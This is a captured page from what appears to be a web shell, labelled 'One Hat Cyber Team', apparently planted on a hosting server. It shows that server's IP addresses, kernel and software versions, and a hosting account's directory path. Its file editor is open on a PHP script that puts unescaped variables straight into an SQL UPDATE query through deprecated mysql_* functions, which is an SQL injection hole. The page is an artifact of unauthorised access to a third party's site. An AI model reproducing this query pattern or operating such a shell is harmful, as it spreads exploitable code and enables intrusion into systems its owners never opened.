One Hat Cyber Team
Your IP :
216.73.216.84
Server IP :
50.6.229.107
Server :
Linux server.hostburly.com 5.14.0-611.38.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 10 17:21:28 EDT 2026 x86_64
Server Software :
Apache
PHP Version :
8.2.30
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
andjemzt
/
nportal.andjemztech.com
/
examAdmin
/
Edit File:
update_doc2link.php
<? $update="UPDATE ebooks SET file_name='$file_name' WHERE bk_id='$bk_id'"; $results = mysql_query($update) or die(mysql_error()); if (mysql_affected_rows() !=0){ echo "<br><p>E- Format of the Document has been updated!<br><br>"; } else{ echo "<p>Sorry, E- Format of the Document was not updated<br> <form> <input type='button' value='back' onClick='window.history.back()'> </form>"; } ?>
Simpan